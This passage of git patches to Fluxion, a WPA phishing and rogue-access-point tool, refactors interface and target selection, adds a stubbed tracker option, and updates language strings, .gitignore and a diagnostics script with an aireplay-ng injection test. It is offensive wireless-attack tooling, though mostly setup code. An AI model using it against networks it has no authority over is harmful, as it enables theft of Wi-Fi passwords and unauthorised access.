+ interface_state "$candidateInterface" if [ "$InterfaceState" = "up" ]; then interfacesAvailableColor+=("$CPrp") @@ -917,20 +922,26 @@ fluxion_get_interface() { # If only one interface exists and it's not unavailable, choose it. if [ "${#interfacesAvailable[@]}" -eq 1 -a \ - "${interfacesAvailableState[0]}" != "[-]" ]; then + "${interfacesAvailableState[0]}" != "[-]" -a \ + "$skipOption" == "" ]; then FluxionInterfaceSelected="${interfacesAvailable[0]}" FluxionInterfaceSelectedState="${interfacesAvailableState[0]}" FluxionInterfaceSelectedInfo="${interfacesAvailableInfo[0]}" break else - interfacesAvailable+=( \ - "$FLUXIONGeneralRepeatOption" \ - "$FLUXIONGeneralBackOption" \ + if [ $skipOption ]; then + interfacesAvailable+=("$FLUXIONGeneralSkipOption") + interfacesAvailableColor+=("$CClr") + fi + + interfacesAvailable+=( + "$FLUXIONGeneralRepeatOption" + "$FLUXIONGeneralBackOption" ) - interfacesAvailableColor+=( \ - "$CClr" \ - "$CClr" \ + interfacesAvailableColor+=( + "$CClr" + "$CClr" ) format_apply_autosize \ @@ -944,6 +955,11 @@ fluxion_get_interface() { echo case "${IOQueryFormatFields[1]}" in + "$FLUXIONGeneralSkipOption") + FluxionInterfaceSelected="" + FluxionInterfaceSelectedState="" + FluxionInterfaceSelectedInfo="" + return 0;; "$FLUXIONGeneralRepeatOption") continue;; "$FLUXIONGeneralBackOption") return -1;; *) @@ -1201,6 +1217,121 @@ fluxion_target_show() { echo } +fluxion_target_unset_tracker() { + if [ ! "$FluxionTargetTrackerInterface" ]; then return 1; fi + + FluxionTargetTrackerInterface="" +} + +fluxion_target_set_tracker() { + if [ "$FluxionTargetTrackerInterface" ]; then return 0; fi + + # Check if attack provides tracking interfaces, get & set one. + if ! type -t attack_tracking_interfaces &> /dev/null; then + return 1 + fi + + if [ "$FluxionTargetTrackerInterface" == "" -a ! "$FLUXIONAuto" ]; then + echo "Running get interface (tracker)." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_tracking_interfaces \ + "$FLUXIONTargetTrackerInterfaceQuery"; then + echo "Failed to get tracker interface!" > $FLUXIONOutputDevice + return 2 + fi + local selectedInterface=$FluxionInterfaceSelected + else + local selectedInterface=$FluxionTargetTrackerInterface + fi + + # If user skipped a tracker interface, move on. + if [ ! "$selectedInterface" ]; then + fluxion_target_unset_tracker + return 0 + fi + + if ! fluxion_allocate_interface $selectedInterface; then + echo "Failed to allocate tracking interface!" > $FLUXIONOutputDevice + return 3 + fi + + echo "Successfully got tracker interface." > $FLUXIONOutputDevice + FluxionTargetTrackerInterface=${FluxionInterfaces[$selectedInterface]} +} + +fluxion_target_unset() { + FluxionTargetMAC="" + FluxionTargetSSID="" + FluxionTargetChannel="" + + FluxionTargetEncryption="" + + FluxionTargetMakerID="" + FluxionTargetMaker="" + + FluxionTargetSSIDClean="" + + FluxionTargetRogueMAC="" + + return 1 # To trigger undo-chain. +} + +fluxion_target_set() { + # Check if attack is targetted & set the attack target if so. + if ! type -t attack_targetting_interfaces &> /dev/null; then + return 1 + fi + + if [ \ + "$FluxionTargetSSID" -a \ + "$FluxionTargetMAC" -a \ + "$FluxionTargetChannel" \ + ]; then + # If we've got a candidate target, ask user if we'll keep targetting it. + + fluxion_header + fluxion_target_show + echo + echo -e "$FLUXIONVLine $FLUXIONTargettingAccessPointAboveNotice" + + # TODO: This doesn't translate choices to the selected language. + while ! echo "$choice" | grep -q "^[ynYN]$" &> /dev/null; do + echo -ne "$FLUXIONVLine $FLUXIONContinueWithTargetQuery [Y/n] " + local choice + read choice + if [ ! "$choice" ]; then break; fi + done + + echo -ne "\n\n" + + if [ "${choice,,}" != "n" ]; then + return 0 + fi + elif [ \ + "$FluxionTargetSSID" -o \ + "$FluxionTargetMAC" -o \ + "$FluxionTargetChannel" \ + ]; then + # TODO: Survey environment here to autofill missing fields. + # In other words, if a user gives incomplete information, scan + # the environment based on either the ESSID or BSSID, & autofill. + echo -e "$FLUXIONVLine $FLUXIONIncompleteTargettingInfoNotice" + sleep 3 + fi + + if ! fluxion_get_interface attack_targetting_interfaces; then + return 2 + fi + + if ! fluxion_allocate_interface $FluxionInterfaceSelected; then + return 3 + fi + + if ! fluxion_get_target \ + ${FluxionInterfaces[$FluxionInterfaceSelected]}; then + return 4 + fi +} + # =================== < Hash Subroutines > =================== # # Parameters: [channel [encryption [maker]]] @@ -1228,12 +1359,7 @@ fluxion_hash_verify() { echo -e "$FLUXIONVLine $FLUXIONHashVerificationMethodQuery" echo - fluxion_target_show \ - "$hashESSID" \ - "$hashEncryption" \ - "$hashChannel" \ - "$hashBSSID" \ - "$hashMaker" + fluxion_target_show local choices=( \ "$FLUXIONHashVerificationMethodPyritOption" \ @@ -1431,78 +1557,6 @@ fluxion_set_attack() { FluxionAttack=${IOQueryFormatFields[0]} } -fluxion_unset_attack_target() { - FluxionTargetMAC="" - FluxionTargetSSID="" - FluxionTargetChannel="" - - FluxionTargetEncryption="" - - FluxionTargetMakerID="" - FluxionTargetMaker="" - - FluxionTargetSSIDClean="" - - FluxionTargetRogueMAC="" - - return 1 # To trigger undo-chain. -} - -fluxion_set_attack_target() { - # Check if attack is targetted & set the attack target if so. - if ! type -t attack_targetting_interfaces &> /dev/null; then - return 1 - fi - - if [ \ - "$FluxionTargetSSID" -a \ - "$FluxionTargetMAC" -a \ - "$FluxionTargetChannel" \ - ]; then - fluxion_header - fluxion_target_show - echo - echo -e "$FLUXIONVLine $FLUXIONTargettingAccessPointAboveNotice" - - # TODO: This doesn't translate choices to the selected language. - while ! echo "$choice" | grep -q "^[ynYN]$" &> /dev/null; do - echo -ne "$FLUXIONVLine $FLUXIONContinueWithTargetQuery [Y/n] " - local choice - read choice - if [ ! "$choice" ]; then break; fi - done - - echo -ne "\n\n" - - if [ "${choice,,}" != "n" ]; then - return 0 - fi - elif [ \ - "$FluxionTargetSSID" -o \ - "$FluxionTargetMAC" -o \ - "$FluxionTargetChannel" \ - ]; then - # TODO: Survey environment here to autofill missing fields. - # In other words, if a user gives incomplete information, scan - # the environment based on either the ESSID or BSSID, & autofill. - echo -e "$FLUXIONVLine $FLUXIONIncompleteTargettingInfoNotice" - sleep 3 - fi - - if ! fluxion_get_interface attack_targetting_interfaces; then - return 2 - fi - - if ! fluxion_allocate_interface $FluxionInterfaceSelected; then - return 3 - fi - - if ! fluxion_get_target \ - ${FluxionInterfaces[$FluxionInterfaceSelected]}; then - return 4 - fi -} - fluxion_unprep_attack() { if type -t unprep_attack &> /dev/null; then unprep_attack @@ -1536,10 +1590,25 @@ fluxion_prep_attack() { # Check if attack is targetted & set the attack target if so. if type -t attack_targetting_interfaces &> /dev/null; then - if ! fluxion_set_attack_target; then return 3; fi + if ! fluxion_target_set; then return 3; fi fi - if ! prep_attack; then return 4; fi + # Check if attack provides tracking interfaces, get & set one. + if type -t attack_tracking_interfaces &> /dev/null; then + if ! fluxion_target_set_tracker; then return 4; fi + # TODO: Remove this below after we've implemented tracking. + # I suggest we use airodump-ng, periodically checking by BSSID. + if [ "$FluxionTargetTrackerInterface" ]; then + fluxion_header + echo -e "$FLUXIONVLine Hold the hell up... that hasn't been implemented yet." + sleep 4 + echo -e "$FLUXIONVLine We'll pretend you selected \"$FLUXIONGeneralSkipOption\"$CClr." + sleep 4 + FluxionTargetTrackerInterface="" + fi + fi + + if ! prep_attack; then return 5; fi } fluxion_run_attack() { diff --git a/language/en.sh b/language/en.sh index 7a4286b..8774b2f 100755 --- a/language/en.sh +++ b/language/en.sh @@ -8,6 +8,8 @@ FLUXIONDeallocatingInterfaceNotice="Deallocating reserved interface $CGrn\"\$int FLUXIONReidentifyingInterface="Renaming interface." FLUXIONUnblockingWINotice="Unblocking all wireless interfaces." +FLUXIONTargetTrackerInterfaceQuery="Select an interface for target tracking." + #FLUXIONFindingExtraWINotice="Looking for extraneous wireless interfaces..." FLUXIONRemovingExtraWINotice="Removing extraneous wireless interfaces..." FLUXIONFindingWINotice="Looking for available wireless interfaces..." @@ -70,6 +72,7 @@ FLUXIONAttackQuery="Select a wireless attack for the access point" FLUXIONAttackInProgressNotice="${CCyn}\$FluxionAttack$CClr attack in progress..." FLUXIONSelectAnotherAttackOption="Select another attack" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +FLUXIONGeneralSkipOption="${CYel}Skip" FLUXIONGeneralBackOption="${CRed}Back" FLUXIONGeneralExitOption="${CRed}Exit" FLUXIONGeneralRepeatOption="${CRed}Repeat" From bb824a0934f30410ef17837f6e89a7532372804d Mon Sep 17 00:00:00 2001 From: William Todt Date: Thu, 25 Jan 2018 21:29:04 +0100 Subject: [PATCH 37/45] Minor code changes and tweaks --- .editorconfig | 4 +- .gitignore | 209 +++++++++++++++++++++++++++++++++-------- .gitmodules | 3 +- .project | 2 +- README.md | 7 -- fluxion | 9 +- language/cs.sh | 1 + language/de.sh | 1 + language/el.sh | 1 + language/en.sh | 1 + language/es.sh | 1 + language/fr.sh | 1 + language/it.sh | 1 + language/pl.sh | 1 + language/pt-br.sh | 1 + language/ro.sh | 1 + language/sk.sh | 1 + language/sl.sh | 1 + language/tk.sh | 1 + language/zh.sh | 1 + scripts/debug.sh | 6 +- scripts/diagnostics.sh | 81 ++++++++++------ scripts/router.sh | 70 -------------- 23 files changed, 249 insertions(+), 156 deletions(-) delete mode 100755 scripts/router.sh diff --git a/.editorconfig b/.editorconfig index c68852e..0b79d02 100644 --- a/.editorconfig +++ b/.editorconfig @@ -7,12 +7,12 @@ max_line_length=120 [*.sh] indent_style = tab -indent_size = 2 +indent_size = 4 charset = utf-8 trim_trailing_whitespace = true [*.py] -indent_size=2 +indent_size = 4 [*.md] trim_trailing_whitespace = false diff --git a/.gitignore b/.gitignore index f2500c2..57c0236 100644 --- a/.gitignore +++ b/.gitignore @@ -1,38 +1,173 @@ + +# Custom files *~ *.swp *.swo *.cap *.log +*.conf +*.lock +*.save *.backup -BullyOutput.txt -/preferences.sh* +# Compiled Object files +*.slo +*.lo +*.o +*.obj -# temporary files which can be created if a process still has a handle open of a deleted file -.fuse_hidden* +# Precompiled Headers +*.gch +*.pch -# KDE directory preferences -.directory +# Compiled Dynamic libraries +*.so +*.dylib +*.dll -# Linux trash folder which might appear on any partition or disk -.Trash-* +# Fortran module files +*.mod +*.smod -# .nfs files are created when an open file is removed but is still being accessed -.nfs* +# Compiled Static libraries +*.lai +*.la +*.a +*.lib -# Cache files for Sublime Text +# Executables +*.exe +*.out +*.app + +### Calabash ### +# Calabash / Cucumber +rerun/ +reports/ +screenshots/ +screenshot*.png +test-servers/ + +# bundler +.bundle +vendor + +### Python ### +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +*.egg-info/ +.installed.cfg +*.egg + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +.hypothesis/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# pyenv +.python-version + +# celery beat schedule file +celerybeat-schedule.* + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ + +### SublimeText ### +# cache files for sublime text *.tmlanguage.cache *.tmPreferences.cache *.stTheme.cache -# Workspace files are user-specific +# workspace files are user-specific *.sublime-workspace -# Project files should be checked into the repository, unless a significant -# proportion of contributors will probably not be using Sublime Text +# project files should be checked into the repository, unless a significant +# proportion of contributors will probably not be using SublimeText # *.sublime-project -# SFTP configuration file +# sftp configuration file sftp-config.json # Package control specific files @@ -51,30 +186,22 @@ bh_unicode_properties.cache # https://packagecontrol.io/packages/sublime-github GitHub.sublime-settings -# General -*.DS_Store -.AppleDouble -.LSOverride +### Vim ### +# swap +.sw[a-p] +.*.sw[a-p] +# session +Session.vim +# temporary +.netrwhist +*~ +# auto-generated tag files +tags -# Icon must end with two \r -Icon - - -# Thumbnails -._* - -# Files that might appear in the root of a volume -.DocumentRevisions-V100 -.fseventsd -.Spotlight-V100 -.TemporaryItems -.Trashes -.VolumeIcon.icns -.com.apple.timemachine.donotpresent - -# Directories potentially created on remote AFP share -.AppleDB -.AppleDesktop -Network Trash Folder -Temporary Items -.apdisk +### VisualStudioCode ### +.vscode/* +!.vscode/settings.json +!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json +.history \ No newline at end of file diff --git a/.gitmodules b/.gitmodules index da31889..b7adfeb 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,4 +1,3 @@ [submodule "attacks/Captive Portal/sites"] path = attacks/Captive Portal/sites - #url = git@github.com:FluxionNetwork/sites.git - url = https://github.com/FluxionNetwork/sites + url = https://github.com/FluxionNetwork/sites diff --git a/.project b/.project index a4206b7..6ab8b19 100644 --- a/.project +++ b/.project @@ -1,6 +1,6 @@ - fluxion + Fluxion diff --git a/README.md b/README.md index 128c62d..bbc77e7 100644 --- a/README.md +++ b/README.md @@ -3,13 +3,6 @@ # Fluxion is the future of MITM WPA attacks Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) less bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phising) attack. It's compatible with the latest release of Kali (rolling). Fluxion's attacks' setup is mostly manual, but experimental auto-mode handles some of the attacks' setup parameters. Read the [FAQ](https://github.com/FluxionNetwork/fluxion/wiki/FAQ) before requesting issues. -## Router login page -Share your own router page with a simple script -``` -cd scripts -sudo sh router.sh -``` - ## Installation Read [here](https://github.com/FluxionNetwork/fluxion/wiki/Generate-ssh-keys) before you do the following steps.
diff --git a/fluxion b/fluxion index 57c10cf..13180a5 100755 --- a/fluxion +++ b/fluxion @@ -14,7 +14,7 @@ declare -r FLUXIONPath=$(cd "$(dirname "$0")"; pwd -P) declare -r FLUXIONWorkspacePath="/tmp/fluxspace" # Path to FLUXION's preferences file, to be loaded afterward. -declare -r FLUXIONPreferencesFile="$FLUXIONPath/preferences.sh" +declare -r FLUXIONPreferencesFile="$FLUXIONPath/preferences.conf" # Constants denoting the reference noise floor & ceiling levels. # These are used by the the wireless network scanner visualizer. @@ -22,7 +22,7 @@ declare -r FLUXIONNoiseFloor=-90 declare -r FLUXIONNoiseCeiling=-60 declare -r FLUXIONVersion=4 -declare -r FLUXIONRevision=0 +declare -r FLUXIONRevision=1 # ============================================================ # @@ -1553,6 +1553,11 @@ fluxion_set_attack() { if [ "${IOQueryFormatFields[1]}" = "$FLUXIONGeneralBackOption" ]; then return -1 fi + + if [ "${IOQueryFormatFields[1]}" = "$FluxionRestartOption" ]; then + return 2 + fi + FluxionAttack=${IOQueryFormatFields[0]} } diff --git a/language/cs.sh b/language/cs.sh index 2928752..97a5bab 100755 --- a/language/cs.sh +++ b/language/cs.sh @@ -35,6 +35,7 @@ FLUXIONAbsolutePathInfo="Absolute path" FLUXIONScannerChannelQuery="Vyberte kanál" FLUXIONScannerChannelOptionAll="Všechny kanály" FLUXIONScannerChannelOptionSpecific="Specifický kanál(y)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelSingleTip="Jeden kanál" FLUXIONScannerChannelMiltipleTip="Více kanálů" diff --git a/language/de.sh b/language/de.sh index 660b930..f8267c9 100755 --- a/language/de.sh +++ b/language/de.sh @@ -35,6 +35,7 @@ FLUXIONAbsolutePathInfo="Geben sie den absoluten Pfad ein" FLUXIONScannerChannelQuery="Wähle deinen Netzwerkfrequenz aus" FLUXIONScannerChannelOptionAll="Alle Netzwerkfrequenzen" FLUXIONScannerChannelOptionSpecific="Spezifische Frequenz(en)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelSingleTip="Einzelne Frequenz" FLUXIONScannerChannelMiltipleTip="Mehrere Frequenzen" diff --git a/language/el.sh b/language/el.sh index acca561..010cda0 100755 --- a/language/el.sh +++ b/language/el.sh @@ -35,6 +35,7 @@ FLUXIONAbsolutePathInfo="Εισαγετε διαδρομή αρχειου" FLUXIONScannerChannelQuery="Επίλεξτε κανάλι" FLUXIONScannerChannelOptionAll="Όλα τα κανάλια" FLUXIONScannerChannelOptionSpecific="Συγκεκριμένο(α) κανάλι(α)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelSingleTip="Ενα κανάλι" FLUXIONScannerChannelMiltipleTip="Πολλαπλά κανάλια" diff --git a/language/en.sh b/language/en.sh index 8774b2f..40b64d1 100755 --- a/language/en.sh +++ b/language/en.sh @@ -71,6 +71,7 @@ FLUXIONHashVerificationMethodAircrackOption="aircrack-ng verification (${CYel}un FLUXIONAttackQuery="Select a wireless attack for the access point" FLUXIONAttackInProgressNotice="${CCyn}\$FluxionAttack$CClr attack in progress..." FLUXIONSelectAnotherAttackOption="Select another attack" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONGeneralSkipOption="${CYel}Skip" FLUXIONGeneralBackOption="${CRed}Back" diff --git a/language/es.sh b/language/es.sh index 81e2faa..a2d0142 100755 --- a/language/es.sh +++ b/language/es.sh @@ -44,6 +44,7 @@ FLUXIONScannerHeader="FLUXION Escáner" FLUXIONAPServiceQuery="Seleccione Opción de Ataque" FLUXIONAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recomendado$CClr)" FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}Conexión más lenta$CClr)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashSourceQuery="Select a method to retrieve the handshake" FLUXIONHashSourcePathOption="Path to capture file" diff --git a/language/fr.sh b/language/fr.sh index c8a7a09..88156b8 100755 --- a/language/fr.sh +++ b/language/fr.sh @@ -44,6 +44,7 @@ FLUXIONScannerHeader="Scanner FLUXION" FLUXIONAPServiceQuery="Sélectionnez une option d'attaque" FLUXIONAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommandé$CClr)" FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}Connexion plus lente$CClr)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashSourceQuery="Sélectionnez une méthode de récupération de handshake" FLUXIONHashSourcePathOption="Chemin du fichier capturé" diff --git a/language/it.sh b/language/it.sh index 42d2a15..57fba2d 100755 --- a/language/it.sh +++ b/language/it.sh @@ -53,6 +53,7 @@ FLUXIONUseFoundHashQuery="Vuoi usare questo file?" FLUXIONHashVerificationMethodQuery="Seleziona il metodo di verifica dell'hash" FLUXIONHashVerificationMethodPyritOption="pyrit verification (${CGrn}raccomandato$CClr)" FLUXIONHashVerificationMethodAircrackOption="aircrack-ng verification (${CYel}inaffidabile$CClr)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONAttackQuery="Seleziona la tua scelta" FLUXIONAttackInProgressNotice="${CCyn}\$FLUXIONAttack$CClr attacco in corso..." diff --git a/language/pl.sh b/language/pl.sh index b709a78..f8a08a9 100644 --- a/language/pl.sh +++ b/language/pl.sh @@ -31,6 +31,7 @@ FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" FLUXIONHashValidNotice="${CGrn}Success$CClr, hash verification completed!" FLUXIONPathToHandshakeFileQuery="Podaj ścieżkę dostępu do pliku handshake $CClr(Example: /.../dump-01.cap)" FLUXIONAbsolutePathInfo="Absolute path" +FluxionRestartOption="Restart"s # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelQuery="Wybierz kanał do monitorowania" FLUXIONScannerChannelOptionAll="Wszystkie kanały" diff --git a/language/pt-br.sh b/language/pt-br.sh index 64e01e3..4b31b86 100755 --- a/language/pt-br.sh +++ b/language/pt-br.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="Sintetizando os resultados da varredura, aguarde..." FLUXIONScannerFailedNotice="Wireless card não suportado (sem APs encontrados)" FLUXIONScannerDetectedNothingNotice="Sem APs encontrados, retornando..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Arquivo hash não existe!" FLUXIONHashInvalidError="${CRed}Error$CClr, arquivo hash inválido!" diff --git a/language/ro.sh b/language/ro.sh index f60074c..23495b6 100755 --- a/language/ro.sh +++ b/language/ro.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="Synthesizing scan results, please wait..." FLUXIONScannerFailedNotice="Wireless card may not be supported (no APs found)" FLUXIONScannerDetectedNothingNotice="No access points were detected, returning..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Hash file does not exist!" FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" diff --git a/language/sk.sh b/language/sk.sh index 9cf48e6..e2663d7 100644 --- a/language/sk.sh +++ b/language/sk.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Päť sekúnd po objavení sa cieľového AP, zavrite FLUXIONPreparingScannerResultsNotice="Výsledky scanu sa pripravujú, čakajte..." FLUXIONScannerFailedNotice="Bezdrôtová sieťová karta nemusí byť podporovaná (nenašli sa žiadne AP)" FLUXIONScannerDetectedNothingNotice="Žiadne prístupové body neboli najdené, vraciam sa..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Súbor 'hash' neexistuje!" FLUXIONHashInvalidError="${CRed}Error$CClr, nesprávny 'hash' súbor!" diff --git a/language/sl.sh b/language/sl.sh index 7749eea..4838b1f 100755 --- a/language/sl.sh +++ b/language/sl.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="Synthesizing scan results, please wait..." FLUXIONScannerFailedNotice="Wireless card may not be supported (no APs found)" FLUXIONScannerDetectedNothingNotice="No access points were detected, returning..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Hash file does not exist!" FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" diff --git a/language/tk.sh b/language/tk.sh index 6669584..781417b 100755 --- a/language/tk.sh +++ b/language/tk.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="Synthesizing scan results, please wait..." FLUXIONScannerFailedNotice="Wireless card may not be supported (no APs found)" FLUXIONScannerDetectedNothingNotice="No access points were detected, returning..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Hash file does not exist!" FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" diff --git a/language/zh.sh b/language/zh.sh index 64d1cac..8f1da14 100755 --- a/language/zh.sh +++ b/language/zh.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="综合扫描的结果获取中,请稍等..." FLUXIONScannerFailedNotice="你的无线网卡好像不支持 (没有发现APs)" FLUXIONScannerDetectedNothingNotice="没有发现访问点, 请返回重试..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Hash文件不存在!" FLUXIONHashInvalidError="${CRed}错误$CClr, 无效的Hash文件!" diff --git a/scripts/debug.sh b/scripts/debug.sh index 8ecf4b3..cd4d8a1 100755 --- a/scripts/debug.sh +++ b/scripts/debug.sh @@ -1,4 +1,6 @@ #!/ bin / bash -export FLUXIONDebug = 1 export FLUXIONWIKillProcesses = - 1 export FLUXIONWIReloadDriver = 1 +# These are the debug flags used by the script +export FLUXIONDebug=1 +export FLUXIONWIKillProcesses=1 +export FLUXIONWIReloadDriver=1 diff --git a/scripts/diagnostics.sh b/scripts/diagnostics.sh index 4439d5f..f766015 100755 --- a/scripts/diagnostics.sh +++ b/scripts/diagnostics.sh @@ -1,66 +1,89 @@ #!/bin/bash -if [ -d "lib" ]; then source lib/InterfaceUtils.sh -elif [ -d "../lib" ]; then source ../lib/InterfaceUtils.sh +clear +declare -r HEADER_SIZE="####" + +# Diagnostic script + +if [ -d "lib" ];then + source lib/InterfaceUtils.sh +elif [ -d "../lib" ];then + source ../lib/InterfaceUtils.sh else - echo "YOU MUST EXECUTE THIS SCRIPT FROM FLUXION'S ROOT!" + echo -e "\033[31mError lib folder not found\033[0m" exit 1 fi if [ ! "$1" ]; then - echo "Usage ./scripts/diagnostics " + echo "Usage ./scripts/diagnostics [wireless_interface]" exit 1 fi -echo "[ FLUXION Info ]" -if [ -f "./fluxion.sh" ] - then declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" fluxion.sh)) - else declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" ../fluxion.sh)) +echo "$HEADER_SIZE FLUXION Info" +if [ -f "fluxion" ];then + declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" fluxion)) +else + declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" ../fluxion)) fi echo "FLUXION V${FLUXIONInfo[0]/*=/}.${FLUXIONInfo[1]/*=/}" echo -ne "\n\n" -echo "[ BASH Info ]" +echo "$HEADER_SIZE BASH Info " bash --version -echo "Path: $(ls -L $(which bash))" +echo "**Path:** $(ls -L $(which bash))" echo -ne "\n\n" -echo "[ Interface ($1) Info ]" -if interface_physical "$1"; then echo "Device: $InterfacePhysical" -else echo "Device: Unknown" +echo "$HEADER_SIZE Interface ($1) Info " +if interface_physical "$1";then + echo "**Device**: $InterfacePhysical" +else + echo "**Device:** Unknown" fi -if interface_driver "$1"; then echo "Driver: $InterfaceDriver" -else echo "Driver: Unsupported" +if interface_driver "$1";then + echo "**Driver:** $InterfaceDriver" +else + echo "**Driver:** Unsupported" fi -if interface_chipset "$1"; then echo "Chipset: $InterfaceChipset" -else echo "Chipset: Unknown" +if interface_chipset "$1";then + echo "**Chipset:** $InterfaceChipset" +else + echo "**Chipset:** Unknown" fi -echo -n "Injection Test: " -aireplay-ng --test "$1" | grep -oE "Injection is working!|No Answer..." || echo "failed" +if iw list | grep monitor | head -n 1 | tail -n 1 &>/dev/null;then + echo "**Master Modes** Yes" +else + echo "**Master Modes** No" +fi + +echo -n "**Injection Test:** " +aireplay-ng --test "$1" | grep -oE "Injection is working!|No Answer..." || echo -e "\033[31mFailed\033[0m" echo -ne "\n\n" -echo "[ XTerm Info ]" -echo "Version: $(xterm -version)" -echo "Path: $(ls -L $(which xterm))" +echo "$HEADER_SIZE XTerm Infos" +echo "**Version:** $(xterm -version)" +echo "**Path:** $(ls -L $(which xterm))" echo -n "Test: " if xterm -hold -fg "#FFFFFF" -bg "#000000" -title "XServer/XTerm Test" -e "echo \"XServer/XTerm test: close window to continue...\"" &>/dev/null; then echo "XServer/XTerm success!" -else echo "XServer/XTerm failure!" +else + echo -e "\033[31m XServer/XTerm failure!\033[0m" fi echo -ne "\n\n" -echo "[ HostAPD Info ]" +echo "$HEADER_SIZE HostAPD Info" hostapd -v echo "Path: $(ls -L $(which hostapd))" echo -ne "\n\n" -echo "[ Aircrack-ng Info ]" +echo "$HEADER_SIZE Aircrack-ng Info" aircrack-ng -H | head -n 4 -echo -ne 